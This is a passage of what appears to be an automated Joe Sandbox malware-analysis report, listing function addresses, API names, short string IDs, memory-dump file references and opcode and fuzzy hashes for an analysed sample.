                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 5b4e3912c4ed5e98da58e73429ccc2bc2486fb24e1661b8cf84d0985e553daf0
                                      • Instruction ID: d4a042112f0702ecf712680dc2adf232249fce39c1ad98536dc947d721362604
                                      • Opcode Fuzzy Hash: 5b4e3912c4ed5e98da58e73429ccc2bc2486fb24e1661b8cf84d0985e553daf0
                                      • Instruction Fuzzy Hash: 51C24A71E086298FEB25CE289D457EABBB5FB84304F1445EAD84DE7240E775AEC18F40
                                      Function 004F32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog_swprintf
                                      • String ID: CMT$h%u$hc%u
                                      • API String ID: 146138363-3282847064
                                      • Opcode ID: b0091af46338ca892c84d047b17763e0847ae2e9e8847e4ed6368267678e47e4
                                      • Instruction ID: 26bee5fd637b9e9a43e50a8eaaf833190ae9703e4157e13ee96277b2ab478d67
                                      • Opcode Fuzzy Hash: b0091af46338ca892c84d047b17763e0847ae2e9e8847e4ed6368267678e47e4
                                      • Instruction Fuzzy Hash: D732E57151028C9FDF14DF74C995AFA3B95AF15304F04047EFE8A8B282DB78AA49CB24
                                      Function 004F286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F2874
                                      • _strlen.LIBCMT ref: 004F2E3F
                                        • Part of subcall function 005002BA: __EH_prolog.LIBCMT ref: 005002BF
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F2F91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog$Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                      • String ID: CMT
                                      • API String ID: 1057911484-2756464174
                                      • Opcode ID: 718859a28de3ee3434bf1f57b8274f57f839432ce4bc206810c250153c319640
                                      • Instruction ID: 256327d32f2d887a712ac87b8bdb03b649e5d52ec81bd7ef27d7e142a46c4a25
                                      • Opcode Fuzzy Hash: 718859a28de3ee3434bf1f57b8274f57f839432ce4bc206810c250153c319640
                                      • Instruction Fuzzy Hash: 156207715002498FDB19DF34C9856FA3BA1BF54300F08457FEE9A8B382DBB9A945CB24
                                      Function 0051D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                      • Instruction ID: 66826c4ebad28b084e1d72f0f341a5ddfb29d4658d7df15affa81ec97648b52f
                                      • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                      • Instruction Fuzzy Hash: 7B020B71E002199BEF14CFA9D9806EDBBF1FF88314F258269D919E7285D731AA41CB90
                                      Function 004F40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: a7d3dfe9c0aaf8ebd7b86d99e63ab3fbd1586b6b1e00405cc60075bebcb6410c
                                      • Instruction ID: 3439cc11b28fa149c8e148a9ceeb932814c10e13761175531c827bd0068f4f46
                                      • Opcode Fuzzy Hash: a7d3dfe9c0aaf8ebd7b86d99e63ab3fbd1586b6b1e00405cc60075bebcb6410c
                                      • Instruction Fuzzy Hash: C2C13776A183418FC354CF2AD88065BFBE1BFC9208F19892EE998D7311D734E945CB96
                                      Function 04AE456D Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: b=q=
                                      • API String ID: 0-4069823217
                                      • Opcode ID: 7819ad346afa70bb76fe9e4c52834997cc24c25f7a5ecf7e53e716b67314970e
                                      • Instruction ID: e93fab5ce57ee4e02c7ce18e8397d05ffe3f8e8d3535a46ed18349593ec453b6
                                      • Opcode Fuzzy Hash: 7819ad346afa70bb76fe9e4c52834997cc24c25f7a5ecf7e53e716b67314970e
                                      • Instruction Fuzzy Hash: 7E312631549396AFCB328E3884A12D7BFE6AF562013E65AAFC4C48B406D72154C7DB86
                                      Function 005062CA Relevance: .8, Instructions: 829COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction ID: 8af08906bcdfb94bc8b6e7f0a22b74750b62d4f76980fcaa9ef5119cc5620bb8
                                      • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction Fuzzy Hash: 6C62B1716047859FCB25CF28C8906BDBFE1BF95304F08896DE8AA8B386D734E955CB11
                                      Function 005077EF Relevance: .8, Instructions: 817COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction ID: 4418a86de34ee5292af17bd3eb2e57ba1e050a3a26428328a7683a2992e0efed
                                      • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction Fuzzy Hash: E562D871A087498FCB15CF28C4909BDBFE1BF99304F18896DE89A8B386D730E945CB55
                                      Function 004FF461 Relevance: .7, Instructions: 694COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a1e5ada8c23a19605686052367fa2865b8a07688fe5a1d127909fe771fb5587
                                      • Instruction ID: a3695c6d9982a35a69f7bd3e43b5b78274cd615a6104a64a0f0564b92aa1703d
                                      • Opcode Fuzzy Hash: 7a1e5ada8c23a19605686052367fa2865b8a07688fe5a1d127909fe771fb5587
                                      • Instruction Fuzzy Hash: 00524972A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA59CB86
                                      Function 00507153 Relevance: .5, Instructions: 536COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1289c2301875235396db0356645a1a6aea8092f05ca485c5207dc28a13b94fa4
                                      • Instruction ID: 20ec512e4f7ee99d10d821188c1d8ae8c9bf6fa486e54b5aad6d10e3728f98f0
                                      • Opcode Fuzzy Hash: 1289c2301875235396db0356645a1a6aea8092f05ca485c5207dc28a13b94fa4
                                      • Instruction Fuzzy Hash: AC12B3B1A1870A9FC718CF28C8906BDBBE1FB98304F14492EE997C7681D374B595CB45
                                      Function 004FC426 Relevance: .5, Instructions: 454COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 197c522e54025ddc1bcb9563e9fc4070131ccf9b078cba647640f71f8a9f4a10
                                      • Instruction ID: 7dd7ac8a2d49410e7e569829858995cff66910a6182fffecfcc4c9c6ea9c14cd
                                      • Opcode Fuzzy Hash: 197c522e54025ddc1bcb9563e9fc4070131ccf9b078cba647640f71f8a9f4a10
                                      • Instruction Fuzzy Hash: 35F1AB71A083098FD718CF28C6C4A3ABBE1EFCA314F144A2EE685C7351D638D945CB4A
                                      Function 00506CDC Relevance: .3, Instructions: 343COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 95d7495eba7b288cbfeb7c1f8cf1a01db71fe66f947809f5d881a6825d948f5c
                                      • Instruction ID: d30b35e7b571a745a23851c53e97eab11b6459960e47827b0671df8d83040018
                                      • Opcode Fuzzy Hash: 95d7495eba7b288cbfeb7c1f8cf1a01db71fe66f947809f5d881a6825d948f5c
                                      • Instruction Fuzzy Hash: F8D1D4B1A083458FDB14CF28C84475FBFE5BF89308F08496DE8899B282D774EA55CB56
                                      Function 004FE9B7 Relevance: .3, Instructions: 320COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 478f2c8dd5c9289f4ad0cb8710e638d6e1a24da7f57e0ef2423c373be98215d3
                                      • Instruction ID: a563c967631d7b322f40d4dd4344e1b37270e08a3747666698b38d83c3ae36c4
                                      • Opcode Fuzzy Hash: 478f2c8dd5c9289f4ad0cb8710e638d6e1a24da7f57e0ef2423c373be98215d3
                                      • Instruction Fuzzy Hash: 62E12A755083949FC304CF69D89086BBFF0AFAA300F45495EF9D497352C235EA19DBA2
                                      Function 00504088 Relevance: .3, Instructions: 270COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66d5e2ebb20806e963a3a6dd19f0006205bd1a478d0bc341cc39bfcc49e71d2b
                                      • Instruction ID: 037b6f2f874d6901d37c09156e86ebed79ade6b9492178f3e3b90ed0a11b9b93
                                      • Opcode Fuzzy Hash: 66d5e2ebb20806e963a3a6dd19f0006205bd1a478d0bc341cc39bfcc49e71d2b
                                      • Instruction Fuzzy Hash: 099158F020034A9BDB24EE64D895BFE7BD5FB90304F100D2DF79A872C2EA649595CB52
                                      Function 005219F4 Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ed735d3009c788032387d83a07ae73a03470e2e79bb9b48b570b6362c341a9e
                                      • Instruction ID: 79e966065b4f54f9440018d65506a01024382f1f95b56e847339d2492340ce47
                                      • Opcode Fuzzy Hash: 9ed735d3009c788032387d83a07ae73a03470e2e79bb9b48b570b6362c341a9e
